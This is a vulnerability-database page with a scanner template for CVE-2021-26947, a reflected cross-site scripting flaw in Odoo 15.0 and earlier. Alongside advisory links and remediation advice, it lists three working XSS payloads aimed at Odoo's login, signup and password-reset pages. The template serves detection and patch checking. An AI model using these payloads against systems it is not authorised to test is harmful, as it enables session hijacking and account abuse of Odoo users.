| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
| CVE-2021-26947 | 20 Apr 202605:29 | – | circl | |
| Odoo 跨站脚本漏洞 | 25 Apr 202300:00 | – | cnnvd | |
| CVE-2021-26947 | 25 Apr 202318:33 | – | cve | |
| CVE-2021-26947 | 25 Apr 202318:33 | – | cvelist | |
| [SECURITY] [DSA 5399-1] odoo security update | 5 May 202312:02 | – | debian | |
| CVE-2021-26947 | 25 Apr 202318:33 | – | debiancve | |
| Debian DSA-5399-1 : odoo - security update | 5 May 202300:00 | – | nessus | |
| Linux Distros Unpatched Vulnerability : CVE-2021-26947 | 27 Aug 202500:00 | – | nessus | |
| EUVD-2021-13729 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-26947 | 25 Apr 202319:15 | – | nvd |
id: CVE-2021-26947
info:
name: Odoo <= 15.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A cross-site scripting (XSS) vulnerability in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote attackers to inject arbitrary web scripts into the browser of a victim via a crafted link. This issue could lead to the execution of malicious scripts in the context of the user's browser session.
impact: |
Attackers can execute arbitrary scripts in victims' browsers, potentially stealing cookies, session tokens, or performing actions on behalf of the user.
remediation: |
Update to the latest version of Odoo where the vulnerability is fixed or apply security patches that sanitize user inputs properly.
reference:
- https://github.com/odoo/odoo/issues/107694
- https://www.debian.org/security/2023/dsa-5399
- https://nvd.nist.gov/vuln/detail/CVE-2021-26947
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2021-26947
epss-score: 0.0141
epss-percentile: 0.69411
metadata:
max-request: 3
verified: true
vendor: odoo
product: odoo
tags: cve,cve2021,odoo,xss
http:
- method: GET
path:
- "{{BaseURL}}/web/login?error=<script>alert(document.domain)</script>"
- "{{BaseURL}}/web/signup?error=<img/src=x+onerror=alert(document.domain)>"
- "{{BaseURL}}/web/reset_password?error=<svg/onload=alert(document.domain)>"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<script>alert(document.domain)</script>", "<img/src=x onerror=alert(document.domain)>", "<svg/onload=alert(document.domain)>")'
- 'contains_any(body, "content=\"Odoo", "var odoo", "Odoo</title>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100e76d120335442bc2dfb2ce253d74241160bc1ddc929f18ba3e09e665906063d8022033bb1847b0e2ab202260dae5243e3b2455c34547d78b221dd0a57e96b0d25bda:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation